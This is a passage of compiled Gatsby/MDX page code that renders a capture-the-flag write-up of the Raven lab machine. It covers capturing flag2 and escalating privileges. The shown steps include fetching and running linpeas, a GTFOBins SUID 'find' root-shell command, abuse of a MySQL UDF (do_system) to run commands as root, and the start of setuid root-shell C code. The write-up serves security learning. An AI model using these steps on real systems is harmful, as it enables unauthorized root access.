vector.\"), mdx(\"h4\", null, \"Get flag2\"), mdx(\"p\", null, \"Step into upper directory \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/var/www\"), \" and a regular \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ls -alh\"), \" command:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \"cd\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"..\"), \"/ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"&&\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"ls\"), \" -alh\\ntotal 44K\\ndrwxrwxrwx \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4\"), \" root root \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4\"), \".0K Jul \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"8\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"10\"), \":06 \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \".\"), \"\\ndrwxr-xr-x \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"12\"), \" root root \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4\"), \".0K Aug \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"13\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2018\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"..\"), \"\\n-rw------- \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), \" www-data www-data \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2\"), \".3K Jul \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"8\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"14\"), \":11 .bash_history\\ndrwx------ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2\"), \" www-data www-data \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4\"), \".0K Jul \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"8\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"10\"), \":06 .gnupg\\n-rw-r--r-- \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), \" www-data www-data 19K Nov \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"24\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2018\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1518\"), \".so\\n-rw-r--r-- \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"1\"), \" root root \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"40\"), \" Nov \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"9\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"2018\"), \" flag2.txt\\ndrwxrwxrwx \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"10\"), \" root root \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"4\"), \".0K Jul \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"10\"), \" 06:58 html\"))), mdx(\"p\", null, \"Ta da, flag2 captured. Noticed that there is a weird shared library file \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"1518.so\"), \" sitting out there, it might be a hint for privesc.\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/56ba32923f79fee1b450fd3ebbb2951c/00d43/raven-041344.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACS0lEQVQoz32SSW/TQBiGfSpKm7gHRIW6Jd5jG2wn3j3jJXVDQNAmIXQjbiVUTvwEDhz42ZCZD82oLaWtODz6ZvPr91uEAFfPx8eL5cGHRTM+PmneTE+b8fS0eTM7aybz82YyO2uOTi+bRXPdvFt85mdv5xd/+XjB3i+X19+uvv/4+VJQdaOu6gnUk/eQFSOIsxxSXEKUYQjiFKIU83WCcr73o+QRwzAGVFQQxslM6Ha7Nc5LQChfeZ63sm2bOI5LDMMgruvxteM4RJJ6RJYkoijyQ1aqovxSZBm2tl7MhF5PquMkA8dxaZJmFOGC5kVFwyihuKhoFCc0zTBNUkQHQ5+apkU1Xaf6v6wMw4Dd3d2ZsLe3X0dxAq7n0SCMGZBmGLzBkMfbfVnV4HoD0DQNdF2/Q9O0O8GdnZ2ZIMtKXVQHUB9OKM5LivMK/CACVVXAsmwwLQss24a+ad6J3Rd9JNiT5DpDOSBc0iCMaJyk3B0TYh/eoqoq56HoI8Fur1fjooIoTqkfhJSlxRy+dlyequ+HwEpi2684/X7//w73u93aD0KwLIuGYUxYA5hb3w9pnGTsjDclL0fUGwypYRj0RoTHJ1KWDkf1GKrRIRTlCBAugNUxilMYHYyB/Yw5ZJPAavmwKTeQG8G5YPSt6tNZQ5ZXX8nJ+eXqYvmFLK+uyXR+Qo6mC9I3TSKx+ZPZzClEVVUe76Oq6m9W3+3t7SOh0+m011utZH29hZ6traFWq4U6nQ4SBIHT3thAm5ubSBQZIr97ClEUs3a7Lf4B0LhHCYtw0tQAAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"flag2\",\n \"title\": \"flag2\",\n \"src\": \"/static/56ba32923f79fee1b450fd3ebbb2951c/fcda8/raven-041344.png\",\n \"srcSet\": [\"/static/56ba32923f79fee1b450fd3ebbb2951c/12f09/raven-041344.png 148w\", \"/static/56ba32923f79fee1b450fd3ebbb2951c/e4a3f/raven-041344.png 295w\", \"/static/56ba32923f79fee1b450fd3ebbb2951c/fcda8/raven-041344.png 590w\", \"/static/56ba32923f79fee1b450fd3ebbb2951c/efc66/raven-041344.png 885w\", \"/static/56ba32923f79fee1b450fd3ebbb2951c/00d43/raven-041344.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"h4\", null, \"Enumeration\"), mdx(\"p\", null, \"For privilege escalation part, I use \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/\"\n }), \"privilege-escalation-awesome-scripts-suite\"), \" scripts.\"), mdx(\"p\", null, \"Copy it to my current folder:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"cp\"), \" ~/Github/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \".\")))), mdx(\"p\", null, \"Bring up a python http server at kali machine:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ python3 -m http.server \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"80\")))), mdx(\"p\", null, \"At compromised machine side:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token builtin class-name\"\n }), \"cd\"), \" /tmp \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"&&\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"wget\"), \" http://192.168.2.56/linpeas.sh\"))), mdx(\"p\", null, \"Run enumerlation script, and redirect its output to \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"reports.txt\"), \":\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"bash\"), \" linpeas.sh \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \">>\"), \" reports.txt\"))), mdx(\"p\", null, \"I always prefer to save the result of \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"linpeas.sh\"), \" into a file and retrieve it back to my kali machine, then I\\u2019m able to view it locally.\"), mdx(\"h2\", null, \"Privilege Escalation\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/6500973362b4d0af97dc3caeb1fe950b/00d43/raven-042441.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACjUlEQVQoz43QTW8SQRgH8E0PBhqkKSVIaaGw7M4s7MLyWl6W3aUMtDYU2EJpaVlRY9ODxrO9mPTUL+DBxKTePJiYmHgy8eQH8NizFz+EUWYeA+jBqK2HX/7PzOSZPDNcsdpYarS7Q7PZts1mxyY7PbvW7NqktTe1ZR3Y1uG9qc7grt1o9+1N68BudPanZ9vdI5u0+sP+nePR6dMzP7caCpFavQmd7UPYIh0wyCZU67dBr9ahVDFBrxIwNghUzBqUdRMKZX2qqBmwXqpAJl+Y1judXajohsUtut2kYJpQbbbGesUcl8sa1TSd5gslmkymaCKpUoQlihCmgiBShDEVEaIYS9N1JBIZR6PRb6Iogs/ns7gbC0vkYd+Cs5MBqxo6UwsaKxRLrFQssEQc/yTNyDGWkKWZuMSScoypSmyS46QSh1Bw1eJu+f0kZxDI64TJ2RJLZgtQXs9AOZuAnCpPZVUZMslZ/jLZz6emNcuq8jiXUiAcClqc17NIYkoCBs+O2ODDIRu96kJ7WIe4iCAqiP9BYFFBHAsigkAgYHE+r49IcQn23g3Z/uWI3b88BuNBHfggD1hCgNC1GEJojDGGlZUVi1vwBIiqROH8QmFPPrXY449NsB7pEAkKgPGsafLhV/j9Qu/SMokrCD6/nGNfnnP062uOnZ5EmT8kMQmLbNJwlT8m9N501wVFgfMXDXhz4YX3bxH0RjWIhEWQJHztkydTCoJAJxkIBHY5SYpV9/t9Wm7U6cZgayzX1qkgSTS8tkbDkQgNh8P/xPM8zWQy1DCM76ZpAsa4xaUyaVev2ysuL3g0dTWhebh5bY7jNOf8vOZ0ODSn0/lXDodDc7lcGs/zWjqd1nK5XJnnefcPjsBRk2JMs4AAAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"linpeas\",\n \"title\": \"linpeas\",\n \"src\": \"/static/6500973362b4d0af97dc3caeb1fe950b/fcda8/raven-042441.png\",\n \"srcSet\": [\"/static/6500973362b4d0af97dc3caeb1fe950b/12f09/raven-042441.png 148w\", \"/static/6500973362b4d0af97dc3caeb1fe950b/e4a3f/raven-042441.png 295w\", \"/static/6500973362b4d0af97dc3caeb1fe950b/fcda8/raven-042441.png 590w\", \"/static/6500973362b4d0af97dc3caeb1fe950b/efc66/raven-042441.png 885w\", \"/static/6500973362b4d0af97dc3caeb1fe950b/00d43/raven-042441.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"As linpes.sh colorizes its output, browse through that report is rather straightforward. I instantly noticed that it find out the same database credentials as the one I manually find, and a privesc vector \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/usr/bin/find\"), \" with suid enabled, plus a writable file located at \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/usr/lib/mysql/plugin/1518.so\"), \" and a backup folder at \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/var/backups\"), \" contains several juicy files like \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"shadow.bak\"), \", \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"passwd.bak\"), \" , etc. Anyway, I hop over to \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://gtfobins.github.io/\"\n }), \"GTFOBins\"), \" and obtained a command \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/usr/bin/find . -exec /bin/sh -p \\\\; -quit\"), \" try to exploit this \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"find\"), \" binary to get a root shell. Since this machine is running on a rather outdated Debian version that attempt didn\\u2019t make out.\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/a61f0f2da2f2f165b02701a44824e18c/00d43/raven-042609.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACSklEQVQoz4WRa28SQRSGSS29JKSamFgEbOkuMwNb9jbLspdhL2VBsIEKGGqbbhut/gk/+MG/rcwcs7RasGn88OSck8w8885MzomSl8PpxVV/fJ72xudp/+w87Y3maX/Zf0xH8zT9kH5JZ1e36eTyUzqYXKTD6eUDs8v05HR2Nb/+evPt+49iTpZrSRiHEA8T6HTjJfGgC2E/Bv8kBNv1wfE74LJgWWnbBWuFbA67PRi9nwLrBJNcpVhMqKlCm9GFaeuLlmfyDMtVueVqXDMVTuqIS0dHXJYkLsuPWBCMfhKMYX//1SRXfl1KKNWA2qYwLFVoxrHACAlCiKjX78h6jPGTIIQWGGMol8t3QtMygPqWMBxTmK4JitYEckyghhCge7INf1idEUKZdEEIuRPKlTdJ37bgXccVQ68tIseCgd+G2LFAazQAI/xXuipfmdeFymE1mTs+3PihuPZDcUptmNke+E0N9IYCdULW0v034dHBQRJ6bUi6gegwR4SRC1HgAYs8cEMX/NAFalmgqjrougFNVf036bqwUiolhqkC9ahomgo3HU0c6w2BCRL1BhYIo+zRn+T+Yx6Eh4eVnh+0IOi5YPsUwr4PQdcDt9MGs2UskymKskxDnrh+rVbjWS2VStOcrqrx7edrHvdDPhi9Xdhei98v4PKyYi5JMq9Wq4+QJIlTSnkQBL+iKMoOHOcazWZhPDpzS8UK0zSD7T1/wTY2Nlg+v8m28nm2ufmMbW9vsd3d3TV2dnZYoVBgkiQxwzCYZVm+JEl7vwG6yEQrYqnNSgAAAABJRU5ErkJggg==')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"database\",\n \"title\": \"database\",\n \"src\": \"/static/a61f0f2da2f2f165b02701a44824e18c/fcda8/raven-042609.png\",\n \"srcSet\": [\"/static/a61f0f2da2f2f165b02701a44824e18c/12f09/raven-042609.png 148w\", \"/static/a61f0f2da2f2f165b02701a44824e18c/e4a3f/raven-042609.png 295w\", \"/static/a61f0f2da2f2f165b02701a44824e18c/fcda8/raven-042609.png 590w\", \"/static/a61f0f2da2f2f165b02701a44824e18c/efc66/raven-042609.png 885w\", \"/static/a61f0f2da2f2f165b02701a44824e18c/00d43/raven-042609.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"Then, I switch to this weird file \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"1518.o\"), \". Run a quick \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"strings\"), \" check on this shared library file:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ strings /usr/lib/mysql/plugin/1518.o\"))), mdx(\"p\", null, \"Turns out this shared library has a \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"go_system\"), \" function in it, if it can be load into MySQL instance and previously obtained database credential is correct, then I\\u2019m pretty sure that I can launch a program with in that MySQL instance with root privilege.\"), mdx(\"p\", null, \"Connect to MySQL instance:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"shell\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-shell\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-shell\"\n }), \"$ mysql -u root -p -h \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"127.0\"), \".0.1\"))), mdx(\"p\", null, \"And type in that database password, it worked! It\\u2019s a correct credential.\"), mdx(\"p\", null, \"First thing first, let\\u2019s checkout what type databases this instance have:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"mysql\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-mysql\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-mysql\"\n }), \"mysql> show databases;\\n+--------------------+\\n| Database |\\n+--------------------+\\n| information_schema |\\n| mysql |\\n| performance_schema |\\n| wordpress |\\n+--------------------+\\n4 rows in set (0.01 sec)\"))), mdx(\"p\", null, \"Query database version:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"mysql\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-mysql\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-mysql\"\n }), \"mysql> SHOW VARIABLES LIKE \\\"%version%\\\";\\n+-------------------------+------------------+\\n| Variable_name | Value |\\n+-------------------------+------------------+\\n| innodb_version | 5.5.60 |\\n| protocol_version | 10 |\\n| slave_type_conversions | |\\n| version | 5.5.60-0+deb8u1 |\\n| version_comment | (Debian) |\\n| version_compile_machine | x86_64 |\\n| version_compile_os | debian-linux-gnu |\\n+-------------------------+------------------+\\n7 rows in set (0.00 sec)\"))), mdx(\"p\", null, \"I know it\\u2019s a udf exploitation, that user can execute a user-defined function from MySQL instance. So I go ahead and hop over to my browser to google it out, find a blog post of launching program from MySQL database.\"), mdx(\"p\", null, \"Follow it\\u2019s instruction, function query:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"mysql\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-mysql\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-mysql\"\n }), \"mysql> select * from mysql.func\\n -> ;\\n+-----------+-----+---------+----------+\\n| name | ret | dl | type |\\n+-----------+-----+---------+----------+\\n| do_system | 2 | 1518.so | function |\\n+-----------+-----+---------+----------+\\n1 row in set (0.00 sec)\"))), mdx(\"p\", null, \"See, since it\\u2019s already loaded up, no need to bother to do it again\"), mdx(\"p\", null, \"Instead, do a quick \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"id\"), \" command and redirect it\\u2019s output to \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/tmp/out\"), \":\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"mysql\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-mysql\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-mysql\"\n }), \"select do_system('id > /tmp/out; chown www-data.www-data /tmp/out');\"))), mdx(\"p\", null, \"Check it\\u2019s result by using \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"\\\\!\"), \" to execute shell command within MySQL command prompt:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"mysql\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-mysql\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-mysql\"\n }), \"mysql> \\\\!\\nERROR:\\nUsage: \\\\! shell-command\\nmysql> \\\\! cat /tmp/out\\nuid=0(root) gid=0(root) groups=0(root)\"))), mdx(\"p\", null, \"Now, I can execute commands as a root user, next move is to spawn a root shell. Based on the previous discovery, the machine has gcc installed, I can compile a shell from C or upload a shell to this machine, then use \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"do_system\"), \" to \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"chown\"), \" to root and set its uid. Then, if I execute that binary it will give me a root shell.\"), mdx(\"p\", null, \"C code (/tmp/pe.c):\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"include\"), \" \", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token string\"\n }), \"\")), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"include\"), \" \", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token string\"\n }), \"\")), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"include\"), \" \", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token string\"\n }), \"\")), \"\\n\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"main\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"{\"), \"\\n\\t\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"setuid\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"setgid\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token number\"\n }), \"0\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"system\"), mdx(\"span\", _extends({\n parentName: 